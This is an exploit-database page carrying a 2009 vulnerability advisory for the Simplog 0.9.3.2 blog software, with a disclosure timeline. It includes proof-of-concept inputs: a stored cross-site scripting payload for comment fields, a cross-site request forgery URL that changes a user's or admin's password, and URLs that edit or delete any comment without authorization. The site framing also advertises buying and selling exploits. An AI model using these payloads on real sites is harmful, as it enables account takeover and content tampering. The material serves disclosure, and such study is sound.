0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Simplog v0.9.3.2 Mutliple Vulnerabilities
[=========================================
Simplog v0.9.3.2 Mutliple Vulnerabilities
=========================================
################################################################################
Mutliple Vulnerabilities in Simplog v0.9.3.2
Name Multiple vulnerabilities in Simplog
Systems Affected Simplog 0.9.3.2 and possibly earlier versions
Download http://sourceforge.net/projects/simplog/files/simplog/0.9.3.2/simplog-0.9.3.2.tar.gz/download
################################################################################
############
1. OVERVIEW
############
Simplog provides an easy way for users to add blogging capabilities to their existing websites.
Simplog is written in PHP and compatible with multiple databases.
Simplog also features an RSS/Atom aggregator/reader.
###############
2. DESCRIPTION
###############
Simplog is vulnerable to Persistent cross-site scripting, cross-site request forgery and unauthorized comment deletion.
######################
3. TECHNICAL DETAILS
######################
Summery:
(A) Persistent Cross-site Scripting
(B) Cross Site Request Forgery
(C) Edit/Delete Comments (Bypassing Authorization)
(A) Persistent Cross-site Scripting
++++++++++++++++++++++++++++++++++++
Vulnerable page comments.php
Vulnerable Parameters cname, email
When adding a comment for any blog entry, it is possible to add a Persistent XSS payload in "Name" & "Email" parameters due to improper sanitization of the user inputs.
++++
POC
++++
Put this in the comment:
Name: alert("AMol_NAik")
email:">alert("AMol_NAik")
(B) Cross Site Request Forgery
+++++++++++++++++++++++++++++++
Vulnerable Page user.php
This application is vulenrable to CSRF which changes the password of an authenticated user. This is applicable to Admin as well.
++++
POC
++++
http://server/simplog/user.php?pass1=&pass2=&blogid=&act=change
For example, if an authenticated user clicks on the below link, his/her password changes to "AMol_NAik".
http://server/simplog/user.php?pass1=AMol_NAik&pass2=AMol_NAik&blogid=1&act=change
(C) Edit/Delete Comments (Bypassing Authorization)
+++++++++++++++++++++++++++++++++++++++++++++++++++
Vulnerable Page comments.php
Vulnerable Parameters op, cid
The application provides a function to edit n delete the comments to Blog Admin. It is possible for attacker to edit/delete any comment due to improper authorization.
++++
POC
++++
Edit comment: http://server/simplog/comments.php?op=edit&cid=
Delete Comment: http://server/simplog/comments.php?op=del&cid=
############
4. TimeLine
############
03/11/2009 Bug Discovered
03/11/2009 Reported to Vendor
16/11/2009 No response received till the date
16/11/2009 Public Disclosure
# 0day.today [2024-11-15] #